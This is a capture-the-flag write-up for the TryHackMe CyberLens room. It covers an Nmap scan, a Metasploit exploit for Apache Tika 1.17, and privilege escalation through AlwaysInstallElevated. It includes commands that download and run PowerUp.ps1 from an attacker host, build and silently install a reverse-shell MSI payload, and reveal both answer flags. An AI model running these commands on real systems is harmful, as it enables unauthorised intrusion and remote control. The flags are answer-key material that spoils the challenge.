We covered a very easy penetration testing challenge where we started with an Nmap scan followed by web enumeration then we found out a vulenrability in Apache Tika version 1.17 for which a ready and available exploit is found in Metasploit.
Using Metasploit, the vulnerability was exploited, initial access was obtained and privileges were escalated on the Windows machine after running the exploit suggester and finding that AlwaysInstallElevated is enabled. This was part of TryHackMe CyberLens CTF.
Task Scenario
Welcome to the clandestine world of CyberLens, where shadows dance amidst the digital domain and metadata reveals the secrets that lie concealed within every image. As you embark on this thrilling journey, prepare to unveil the hidden matrix of information that lurks beneath the surface, for here at CyberLens, we make metadata our playground.
In this labyrinthine realm of cyber security, we have mastered the arcane arts of digital forensics and image analysis. Armed with advanced techniques and cutting-edge tools, we delve into the very fabric of digital images, peeling back layers of information to expose the unseen stories they yearn to tell.
Picture yourself as a modern-day investigator, equipped not only with technical prowess but also with a keen eye for detail. Our team of elite experts will guide you through the intricate paths of image analysis, where file structures and data patterns provide valuable insights into the origins and nature of digital artifacts.
At CyberLens, we believe that every pixel holds a story, and it is our mission to decipher those stories and extract the truth. Join us on this exciting adventure as we navigate the digital landscape and uncover the hidden narratives that await us at every turn.
Can you exploit the CyberLens web server and discover the hidden flags?
Highlights
Nmap scanning output
─# nmap -A 10.10.189.206
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-18 09:40 EDT
Nmap scan report for cyberlens.thm (10.10.189.206)
Host is up (0.10s latency).
Not shown: 995 closed tcp ports (reset)
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.57 ((Win64))
|_http-server-header: Apache/2.4.57 (Win64)
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: CyberLens: Unveiling the Hidden Matrix
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
3389/tcp open ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=CyberLens
| Not valid before: 2024-05-17T13:10:13
|_Not valid after: 2024-11-16T13:10:13
| rdp-ntlm-info:
| Target_Name: CYBERLENS
| NetBIOS_Domain_Name: CYBERLENS
| NetBIOS_Computer_Name: CYBERLENS
| DNS_Domain_Name: CyberLens
| DNS_Computer_Name: CyberLens
| Product_Version: 10.0.17763
|_ System_Time: 2024-05-18T13:47:39+00:00
|_ssl-date: 2024-05-18T13:47:47+00:00; -10s from scanner time.
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7)... redacted ...
Network Distance: 2 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2024-05-18T13:47:41
|_ start_date: N/A
|_clock-skew: mean: -10s, deviation: 0s, median: -10s
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
TRACEROUTE (using port 587/tcp)
HOP RTT ADDRESS
1 125.60 ms 10.9.0.1
2 121.35 ms cyberlens.thm (10.10.189.206)
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 464.64 seconds
Exploiting Windows using Metasploit
According to the enumeration, the service running on port 61777 is Apache Tika 1.17 which happens to be vulnerable.
Below is the right module for this vulnerability:
msf > use exploit/windows/http/apache_tika_jp2_jscript
msf exploit(apache_tika_jp2_jscript) > show targets
...targets...
msf exploit(apache_tika_jp2_jscript) > set TARGET < target-id >
msf exploit(apache_tika_jp2_jscript) > show options
...show and set options...
msf exploit(apache_tika_jp2_jscript) > exploit
Module Description from Rapid7:
This module exploits a command injection vulnerability in Apache Tika 1.15 – 1.17 on Windows. A file with the image/jp2 content-type is used to bypass magic bytes checking. When OCR is specified in the request, parameters can be passed to change the parameters passed at command line to allow for arbitrary JScript to execute. A JScript stub is passed to execute arbitrary code. This module was verified against version 1.15 – 1.17 on Windows 2012. While the CVE and finding show more versions vulnerable, during testing it was determined only > 1.14 was exploitable due to jp2 support being added.
Downloading and Executing Powerup script to perform Windows privilege escalation
# target machine
iex (iwr -usebasicparsing http://ATTACKER-IP/PowerUp.ps1)
PS C:\Users\CyberLens\Desktop\invoke-allchecks
Generating and executing an MSI payload using Msfvenom
# attacker machine
msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKER-IP LPORT=4546 -f msi > shell.msi
# target machine
wget http://ATTACKER-IP/payload.msi -o payload.msi
msiexec /quiet /qn /i C:\temp\shell.msi
Room Answers | TryHackMe CyberLens CTF
What is the user flag?
THM{T1k4-CV3-f0r-7h3-w1n}
What is the admin flag?
THM{3lev@t3D-4-pr1v35c!}
Video Walkthrough | TryHackMe CyberLens CTF